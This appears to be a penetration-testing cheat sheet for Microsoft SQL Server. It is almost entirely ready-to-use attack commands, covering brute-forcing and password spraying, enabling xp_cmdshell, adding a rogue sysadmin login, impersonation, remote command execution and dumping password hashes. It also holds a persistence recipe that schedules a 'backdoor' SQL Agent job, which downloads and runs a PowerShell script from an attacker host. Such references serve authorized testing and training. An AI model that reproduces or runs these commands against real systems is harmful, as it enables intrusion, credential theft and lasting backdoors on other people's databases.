Appearance
πͺ MSSQL Pentesting β
π Enum β
bash
# Nmap scripts
nmap -p 1433 --script ms-sql-* <target>
# Hydra brute-force
hydra -l sa -P rockyou.txt mssql://<target>
# Passsword Spraying
netexec mssql example.com -u usernames.txt -p 'password' --no-bruteforce --continue-on-successbash
# Metasploit
msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadumpsql
-- Version & user
SELECT @@version;
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
SELECT * FROM sys.database_principals; -- List all users
SELECT name FROM master.dbo.sysdatabases; -- List databases
SELECT name FROM sysobjects WHERE xtype='U'; -- List tables in current DB
SELECT * FROM sys.schemas; -- schemas
SELECT name FROM syscolumns WHERE id = OBJECT_ID('table_name'); -- List columnsπ₯οΈ Command β
bash
# Connect with sqsh (Linux tool)
sqsh -S <target> -U sa -P password
# Connect with mssql-cli
mssql-cli -S <target>,1433 -U sa -P password
# Impacket (for automation)
impacket-mssqlclient sa:password@<target> -windows-authπ PrivEsc β
sql
-- Enable advanced options
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- Add admin user
CREATE LOGIN hacker WITH PASSWORD = 'pwned123!';
EXEC sp_addsrvrolemember 'hacker', 'sysadmin';bash
# Metasploit
msfconsole
msf> use exploit/windows/mssql/mssql_linkcrawlerπ΅οΈ Impersonation β
sql
-- Assume impersonation is allowed
EXECUTE AS 'sa';
EXEC xp_cmdshell 'whoami';π Persistence β
sql
-- Create hidden job (SQL Agent)
EXEC sp_add_job @job_name='backdoor', @enabled=1;
EXEC sp_add_jobstep @job_name='backdoor', @step_name='cmd',
@subsystem='CMDEXEC',
@command='powershell -c "IEX (New-Object Net.WebClient).DownloadString(http://attacker/shell.ps1)"';
EXEC sp_add_schedule @schedule_name='daily', @freq_type=4, @freq_interval=1;
EXEC sp_attach_schedule @job_name='backdoor', @schedule_name='daily';
EXEC sp_add_jobserver @job_name='backdoor';π₯ RCE β
sql
-- Using xp_cmdshell
EXEC xp_cmdshell 'whoami';
-- PowerShell obfuscation
EXEC xp_cmdshell 'powershell -e <BASE64_PAYLOAD>';sql
-- Using sp_oacreate
DECLARE @o INT;
EXEC sp_oacreate 'wscript.shell', @o OUT;
EXEC sp_oamethod @o, 'run', NULL, 'cmd.exe /c whoami';π Looting β
sql
-- Read local file
EXEC xp_cmdshell 'type C:\Windows\System32\drivers\etc\hosts';
-- Dump passwords (if sysadmin)
SELECT name, password_hash FROM master.sys.sql_logins;
-- Grab linked servers
EXEC sp_linkedservers;
SELECT * FROM OPENQUERY("linked_server", 'SELECT name FROM master..sysdatabases');